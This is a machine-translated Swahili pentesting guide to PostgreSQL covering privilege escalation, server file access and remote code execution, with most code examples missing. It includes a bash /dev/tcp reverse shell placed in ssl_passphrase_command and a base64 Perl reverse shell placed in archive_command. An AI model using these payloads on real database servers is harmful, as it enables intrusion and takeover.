5432,5433 - Pentesting Postgresql
Last updated
Last updated
Tumia Trickest kujenga na kujiendesha kwa urahisi kazi zinazotolewa na zana za jamii zilizoendelea zaidi duniani. Pata Ufikiaji Leo:
PostgreSQL in وصف kama mfumo wa hifadhidata wa uhusiano wa vitu ambao ni chanzo wazi. Mfumo huu sio tu unatumia lugha ya SQL bali pia unaimarisha kwa vipengele vya ziada. Uwezo wake unaruhusu kushughulikia aina mbalimbali za data na operesheni, na kuifanya kuwa chaguo bora kwa wabunifu na mashirika.
Bandari ya kawaida: 5432, na ikiwa bandari hii tayari inatumika inaonekana kwamba postgresql itatumia bandari inayofuata (5433 labda) ambayo haijatumiwa.
Ikiwa unakimbia \list
na unapata database inayoitwa rdsadmin
unajua uko ndani ya AWS postgresql database.
Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya database ya PostgreSQL angalia:
PostgreSQL injectionKulingana na utafiti huu, wakati jaribio la kuungana linashindwa, dblink
inatupa sqlclient_unable_to_establish_sqlconnection
exception ikiwa na maelezo ya kosa. Mifano ya maelezo haya imeorodheshwa hapa chini.
Host haipo
DETAIL: haiwezekani kuungana na seva: Hakuna njia kwenda kwa mwenyeji Je, seva inafanya kazi kwenye mwenyeji "1.2.3.4" na inakubali muunganisho wa TCP/IP kwenye bandari 5678?
Bandari imefungwa
Bandari iko wazi
au
Bandari iko wazi au imechujwa
Katika kazi za PL/pgSQL, kwa sasa haiwezekani kupata maelezo ya makosa. Hata hivyo, ikiwa una ufikiaji wa moja kwa moja kwenye seva ya PostgreSQL, unaweza kupata habari muhimu. Ikiwa kuchota majina ya watumiaji na nywila kutoka kwenye meza za mfumo hakuwezekani, unaweza kufikiria kutumia mbinu ya shambulio la orodha ya maneno iliyozungumziwa katika sehemu iliyopita, kwani inaweza kutoa matokeo chanya.
Aina za Majukumu | |
---|---|
rolsuper | Jukumu lina haki za superuser |
rolinherit | Jukumu linaweza kurithi moja kwa moja haki za majukumu ambayo ni mwanachama wake |
rolcreaterole | Jukumu linaweza kuunda majukumu zaidi |
rolcreatedb | Jukumu linaweza kuunda hifadhidata |
rolcanlogin | Jukumu linaweza kuingia. Yaani, jukumu hili linaweza kutolewa kama kitambulisho cha awali cha mamlaka ya kikao |
rolreplication | Jukumu ni jukumu la kuiga. Jukumu la kuiga linaweza kuanzisha muunganisho wa kuiga na kuunda na kufuta nafasi za kuiga. |
rolconnlimit | Kwa majukumu ambayo yanaweza kuingia, hii inaweka idadi ya juu ya muunganisho wa sambamba ambayo jukumu hili linaweza kufanya. -1 inamaanisha hakuna kikomo. |
rolpassword | Si nywila (daima inasomeka kama |
rolvaliduntil | Wakati wa kuisha kwa nywila (inatumika tu kwa uthibitishaji wa nywila); null ikiwa hakuna kuisha |
rolbypassrls | Jukumu linapuuza kila sera ya usalama wa kiwango cha safu, angalia Sehemu 5.8 kwa maelezo zaidi. |
rolconfig | Mipangilio maalum ya jukumu kwa vigezo vya usanidi wa wakati wa kukimbia |
oid | Kitambulisho cha jukumu |
Ikiwa wewe ni mwanachama wa pg_execute_server_program
unaweza kutekeleza programu
Ikiwa wewe ni mwanachama wa pg_read_server_files
unaweza kusoma faili
Ikiwa wewe ni mwanachama wa pg_write_server_files
unaweza kuandika faili
Kumbuka kwamba katika Postgres, mtumiaji, kikundi na jukumu ni sawa. Inategemea tu jinsi unavyotumia na ikiwa unaruhusu kuingia.
Kutoka kwenye commit wanachama wa kikundi kilichofafanuliwa DEFAULT_ROLE_READ_SERVER_FILES
(kinachoitwa pg_read_server_files
) na watumiaji wakuu wanaweza kutumia njia ya COPY
kwenye njia yoyote (angalia convert_and_check_filename
katika genfile.c
):
Kumbuka kwamba ikiwa wewe si mtumiaji mkuu lakini una ruhusa za CREATEROLE unaweza kujiweka kuwa mwanachama wa kundi hilo:
Kuna mifumo mingine ya postgres ambayo inaweza kutumika kusoma faili au kuorodhesha saraka. Ni superusers tu na watumiaji wenye ruhusa maalum wanaoweza kuzitumia:
You can find more functions in https://www.postgresql.org/docs/current/functions-admin.html
Ni watumiaji wa juu tu na wanachama wa pg_write_server_files
wanaweza kutumia nakala kuandika faili.
Kumbuka kwamba ikiwa wewe si mtumiaji mkuu lakini una ruhusa za CREATEROLE
unaweza kujiweka kuwa mwanachama wa kundi hilo:
Kumbuka kwamba COPY haiwezi kushughulikia herufi za newline, kwa hivyo hata kama unatumia payload ya base64 unahitaji kutuma mstari mmoja tu.
Kikomo muhimu sana cha mbinu hii ni kwamba copy
haiwezi kutumika kuandika faili za binary kwani inabadilisha baadhi ya thamani za binary.
Hata hivyo, kuna mbinu nyingine za kupakia faili kubwa za binary:
Big Binary Files Upload (PostgreSQL)Usanidi wa bug bounty: jiandikishe kwa Intigriti, jukwaa la bug bounty la premium lililotengenezwa na hackers, kwa hackers! Jiunge nasi https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!
Ikiwa una ruhusa zinazohitajika kusoma na kuandika faili za seva ya PostgreSQL, unaweza kusasisha jedwali lolote kwenye seva kwa kufuta node ya faili inayohusiana katika directory ya data ya PostgreSQL. Zaidi kuhusu mbinu hii hapa.
Hatua zinazohitajika:
Pata directory ya data ya PostgreSQL
Kumbuka: Ikiwa huwezi kupata njia ya sasa ya directory ya data kutoka kwa mipangilio, unaweza kuuliza toleo kuu la PostgreSQL kupitia SELECT version()
na kujaribu kulazimisha njia hiyo. Njia za kawaida za directory ya data kwenye usakinishaji wa Unix wa PostgreSQL ni /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Jina la kawaida la klasta ni main
. 2. Pata njia ya relative kwa filenode, inayohusiana na jedwali lengwa
Hii inapaswa kurudisha kitu kama base/3/1337
. Njia kamili kwenye diski itakuwa $DATA_DIRECTORY/base/3/1337
, yaani /var/lib/postgresql/13/main/base/3/1337
. 3. Pakua filenode kupitia kazi za lo_*
Pata aina ya data, inayohusiana na jedwali lengwa
Tumia Mhariri wa Filenode wa PostgreSQL ili kuhariri filenode; weka bendera zote za rol*
kuwa 1 kwa ruhusa kamili.
6. Re-upload filenode iliyohaririwa kupitia kazi za lo_*
, na kufuta faili asilia kwenye diski
(Hiari) Safisha cache ya jedwali ya ndani kwa kuendesha swali la SQL lenye gharama kubwa
Sasa unapaswa kuona thamani za jedwali zilizosasishwa katika PostgreSQL.
Unaweza pia kuwa superadmin kwa kuhariri jedwali la pg_authid
. Tazama sehemu ifuatayo.
Tangu toleo 9.3, ni watumiaji wa super tu na wanachama wa kundi pg_execute_server_program
wanaweza kutumia copy kwa RCE (mfano na exfiltration:
Mfano wa exec:
Kumbuka kwamba ikiwa wewe si mtumiaji mkuu lakini una ruhusa za CREATEROLE
unaweza kujiweka kuwa mwanachama wa kundi hilo:
Au tumia moduli multi/postgres/postgres_copy_from_program_cmd_exec
kutoka metasploit.
Maelezo zaidi kuhusu udhaifu huu hapa. Ingawa iliripotiwa kama CVE-2019-9193, Postges ilitangaza kuwa hii ilikuwa kipengele na haitarekebishwa.
Mara tu umepata kujifunza kutoka kwa chapisho la awali jinsi ya kupakia faili za binary unaweza kujaribu kupata RCE kwa kupakia nyongeza ya postgresql na kuipakia.
RCE with PostgreSQL ExtensionsVikosi vya RCE vilivyo hapa chini ni muhimu sana katika muktadha wa SQLi uliokandamizwa, kwani hatua zote zinaweza kufanywa kupitia taarifa za SELECT zilizozungushwa
Faili ya usanidi ya PostgreSQL inaweza kuandikwa na mtumiaji postgres, ambaye ndiye anayesimamia hifadhidata, hivyo kama superuser, unaweza kuandika faili kwenye mfumo wa faili, na kwa hivyo unaweza kuandika tena faili hii.
Maelezo zaidi kuhusu mbinu hii hapa.
Faili ya usanidi ina sifa kadhaa za kuvutia ambazo zinaweza kusababisha RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Njia ya funguo binafsi ya hifadhidata
ssl_passphrase_command = ''
Ikiwa faili binafsi inalindwa na nenosiri (imefichwa) postgresql itafanya amri iliyoonyeshwa katika sifa hii.
ssl_passphrase_command_supports_reload = off
Ikiwa sifa hii iko juu amri inayotekelezwa ikiwa funguo inalindwa na nenosiri itafanywa wakati pg_reload_conf()
inatekelezwa.
Kisha, mshambuliaji atahitaji:
Dondosha funguo binafsi kutoka kwa seva
Fichua funguo binafsi iliyopakuliwa:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Andika tena
Dondosha usanidi wa sasa wa postgresql
Andika tena usanidi na usanidi wa sifa zilizotajwa:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Tekeleza pg_reload_conf()
Wakati wa kujaribu hii niliona kuwa hii itafanya kazi tu ikiwa faili ya funguo binafsi ina ruhusa 640, inamilikiwa na root na na kikundi ssl-cert au postgres (hivyo mtumiaji postgres anaweza kuisoma), na iko katika /var/lib/postgresql/12/main.
Maelezo zaidi kuhusu usanidi huu na kuhusu WAL hapa.
Sifa nyingine katika faili ya usanidi ambayo inaweza kutumika ni archive_command
.
Ili hii ifanye kazi, mipangilio ya archive_mode
inapaswa kuwa 'on'
au 'always'
. Ikiwa hiyo ni kweli, basi tunaweza kuandika tena amri katika archive_command
na kulazimisha itekelezwe kupitia operesheni za WAL (kuandika mbele ya kuandika).
Hatua za jumla ni:
Angalia ikiwa hali ya archive imewezeshwa: SELECT current_setting('archive_mode')
Andika tena archive_command
na payload. Kwa mfano, shell ya kurudi: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Reload usanidi: SELECT pg_reload_conf()
Lazimisha operesheni ya WAL ifanye kazi, ambayo itaita amri ya archive: SELECT pg_switch_wal()
au SELECT pg_switch_xlog()
kwa baadhi ya matoleo ya Postgres
Maelezo zaidi kuhusu mbinu hii hapa.
Huu mwelekeo wa shambulio unatumia faida ya mabadiliko yafuatayo ya usanidi:
session_preload_libraries
-- maktaba ambazo zitawekwa na seva ya PostgreSQL wakati wa muunganisho wa mteja.
dynamic_library_path
-- orodha ya saraka ambapo seva ya PostgreSQL itatafuta maktaba.
Tunaweza kuweka thamani ya dynamic_library_path
kuwa saraka, inayoweza kuandikwa na mtumiaji postgres
anayesimamia hifadhidata, kwa mfano, saraka ya /tmp/
, na kupakia kitu kibaya cha .so
huko. Kisha, tutalazimisha seva ya PostgreSQL kupakia maktaba yetu mpya iliyopakuliwa kwa kuijumuisha katika mabadiliko ya session_preload_libraries
.
Hatua za shambulio ni:
Pakua postgresql.conf
ya asili
Jumuisha saraka ya /tmp/
katika thamani ya dynamic_library_path
, kwa mfano dynamic_library_path = '/tmp:$libdir'
Jumuisha jina la maktaba mbaya katika thamani ya session_preload_libraries
, kwa mfano session_preload_libraries = 'payload.so'
Angalia toleo kuu la PostgreSQL kupitia swali la SELECT version()
Jenga msimbo wa maktaba mbaya na pakiti sahihi ya maendeleo ya PostgreSQL Mifano ya msimbo:
Kujenga msimbo:
Pakua postgresql.conf
mbaya, iliyoundwa katika hatua 2-3, na uandike tena ile ya asili
Pakua payload.so
kutoka hatua 5 hadi saraka ya /tmp
Reload usanidi wa seva kwa kuanzisha tena seva au kuitisha swali la SELECT pg_reload_conf()
Katika muunganisho ujao wa DB, utapokea muunganisho wa shell ya kurudi.
Kulingana na nyaraka: Majukumu yenye CREATEROLE
ruhusa yanaweza kutoa au kubatilisha uanachama katika jukumu lolote ambalo haliko superuser.
Hivyo, ikiwa una ruhusa ya CREATEROLE
unaweza kujipatia ufikiaji wa majukumu mengine (ambayo si superuser) ambayo yanaweza kukupa chaguo la kusoma na kuandika faili na kutekeleza amri:
Watumiaji wenye jukumu hili wanaweza pia kubadilisha neno la siri la watumiaji wengine wasio-superuser:
Ni kawaida kupata kwamba watumiaji wa ndani wanaweza kuingia katika PostgreSQL bila kutoa nenosiri lolote. Hivyo, mara tu unapokuwa umepata idhini za kutekeleza msimbo unaweza kutumia idhini hizi kukupa SUPERUSER
jukumu:
Hii mara nyingi inawezekana kwa sababu ya mistari ifuatayo katika faili la pg_hba.conf
:
Katika hati hii inaelezwa jinsi ilivyowezekana privesc katika Postgres GCP kwa kutumia kibali cha ALTER TABLE ambacho kilitolewa kwa mtumiaji.
Unapojaribu kufanya mtumiaji mwingine kuwa mmiliki wa jedwali unapaswa kupata kosa linalokuzuia, lakini kwa wazi GCP ilitoa chaguo hilo kwa mtumiaji wa postgres ambaye si superuser katika GCP:
Kuunganisha wazo hili na ukweli kwamba wakati amri za INSERT/UPDATE/ANALYZE zinapotekelezwa kwenye jedwali lenye kazi ya kiashiria, kazi inaitwa kama sehemu ya amri kwa idhini za mmiliki wa jedwali. Inawezekana kuunda kiashiria na kazi na kutoa idhini za mmiliki kwa super user juu ya jedwali hilo, na kisha kuendesha ANALYZE juu ya jedwali na kazi mbaya ambayo itakuwa na uwezo wa kutekeleza amri kwa sababu inatumia idhini za mmiliki.
Anza kwa kuunda jedwali jipya.
Ingiza maudhui yasiyo na umuhimu katika jedwali ili kutoa data kwa ajili ya kazi ya index.
Tengeneza kazi ya index yenye uharibifu ambayo ina payload ya utekelezaji wa msimbo, ikiruhusu amri zisizoidhinishwa kutekelezwa.
BADILI mmiliki wa jedwali kuwa "cloudsqladmin," ambayo ni jukumu la superuser la GCP linalotumiwa pekee na Cloud SQL kusimamia na kudumisha hifadhidata.
Fanya operesheni ya ANALYZE kwenye jedwali. Kitendo hiki kinamfanya injini ya PostgreSQL kubadilisha kwenye muktadha wa mtumiaji wa mmiliki wa jedwali, "cloudsqladmin." Kwa hivyo, kazi ya index yenye uharibifu inaitwa kwa ruhusa za "cloudsqladmin," hivyo kuruhusu utekelezaji wa amri ya shell ambayo haikuwa na idhini hapo awali.
Katika PostgreSQL, mtiririko huu unaonekana kama ifuatavyo:
Kisha, jedwali la shell_commands_results
litakuwa na matokeo ya msimbo uliofanywa:
Baadhi ya mifumo ya postgresql isiyo sahihi inaweza kuruhusu kuingia kwa mtumiaji yeyote wa ndani, inawezekana kuingia kutoka 127.0.0.1 kwa kutumia dblink
function:
Kumbuka kwamba ili kuifanya query ya awali ifanye kazi kazi dblink
inahitaji kuwepo. Ikiwa haipo unaweza kujaribu kuunda hiyo kwa
Ikiwa una nenosiri la mtumiaji mwenye mamlaka zaidi, lakini mtumiaji huyo hana ruhusa ya kuingia kutoka kwa IP ya nje, unaweza kutumia kazi ifuatayo kutekeleza maswali kama mtumiaji huyo:
Ni possible kuangalia kama kazi hii ipo kwa:
Katika andiko hili, wapentester waliweza kupandisha hadhi ndani ya mfano wa postgres uliopewa na IBM, kwa sababu walipata kazi hii yenye bendera ya SECURITY DEFINER:
Kama ilivyoelezwa katika nyaraka kazi yenye SECURITY DEFINER inatekelezwa kwa mamlaka ya mtumiaji anayemiliki. Hivyo, ikiwa kazi hiyo ina udhaifu wa SQL Injection au inafanya baadhi ya vitendo vya mamlaka na vigezo vinavyodhibitiwa na mshambuliaji, inaweza kutumika vibaya ili kupandisha mamlaka ndani ya postgres.
Katika mstari wa 4 wa msimbo uliopita unaweza kuona kwamba kazi hiyo ina bendera ya SECURITY DEFINER.
Na kisha tekeleza amri:
PL/pgSQL ni lugha ya programu yenye vipengele vyote ambayo inatoa udhibiti wa taratibu zaidi ikilinganishwa na SQL. Inaruhusu matumizi ya mizunguko na miundo ya udhibiti kuboresha mantiki ya programu. Zaidi ya hayo, kauli za SQL na triggers zina uwezo wa kuita kazi ambazo zimeundwa kwa kutumia lugha ya PL/pgSQL. Uunganisho huu unaruhusu njia pana na inayoweza kubadilika zaidi katika programu na automatisering ya hifadhidata. Unaweza kutumia lugha hii ili kuomba PostgreSQL kujaribu nguvu akreditasi za watumiaji.
PL/pgSQL Password BruteforceVector ifuatayo ya privesc ni muhimu sana katika muktadha wa SQLi uliokandamizwa, kwani hatua zote zinaweza kufanywa kupitia kauli za SELECT zilizopangwa
Ikiwa unaweza kusoma na kuandika faili za seva za PostgreSQL, unaweza kuwa superuser kwa kubadilisha filenode ya PostgreSQL kwenye diski, inayohusishwa na meza ya ndani ya pg_authid
.
Soma zaidi kuhusu mbinu hii hapa.
Hatua za shambulio ni:
Pata directory ya data ya PostgreSQL
Pata njia ya kulinganisha kwa filenode, inayohusishwa na meza ya pg_authid
Pakua filenode kupitia kazi za lo_*
Pata aina ya data, inayohusishwa na meza ya pg_authid
Tumia Mhariri wa Filenode wa PostgreSQL ili kuhariri filenode; weka bendera zote za rol*
boolean kuwa 1 kwa ruhusa kamili.
Pandisha tena filenode iliyohaririwa kupitia kazi za lo_*
, na ubadilishe faili asilia kwenye diski
(Chaguo) Safisha cache ya meza ya ndani kwa kuendesha swali la SQL lenye gharama kubwa
Sasa unapaswa kuwa na ruhusa za superadmin kamili.
Ndani ya faili postgresql.conf unaweza kuwezesha kumbukumbu za postgresql kwa kubadilisha:
Then, restart the service.
pgadmin ni jukwaa la usimamizi na maendeleo kwa ajili ya PostgreSQL. Unaweza kupata nywila ndani ya faili ya pgadmin4.db Unaweza kuzifungua kwa kutumia kazi ya decrypt ndani ya script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
Uthibitisho wa mteja katika PostgreSQL unasimamiwa kupitia faili ya usanidi inayoitwa pg_hba.conf. Faili hii ina mfululizo wa rekodi, kila moja ikitaja aina ya muunganisho, anwani ya IP ya mteja (ikiwa inahitajika), jina la database, jina la mtumiaji, na njia ya uthibitisho ya kutumia kwa muunganisho unaolingana. Rekodi ya kwanza inayolingana na aina ya muunganisho, anwani ya mteja, database iliyotakiwa, na jina la mtumiaji inatumika kwa uthibitisho. Hakuna njia mbadala au ya akiba ikiwa uthibitisho unashindwa. Ikiwa hakuna rekodi inayolingana, ufikiaji unakataliwa.
Mbinu za uthibitisho zinazopatikana zinazotumia nenosiri katika pg_hba.conf ni md5, crypt, na password. Mbinu hizi zinatofautiana katika jinsi nenosiri linavyotumwa: limepangwa kwa MD5, limefichwa kwa crypt, au maandiko wazi. Ni muhimu kutambua kwamba njia ya crypt haiwezi kutumika na nenosiri ambayo imefichwa katika pg_authid.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)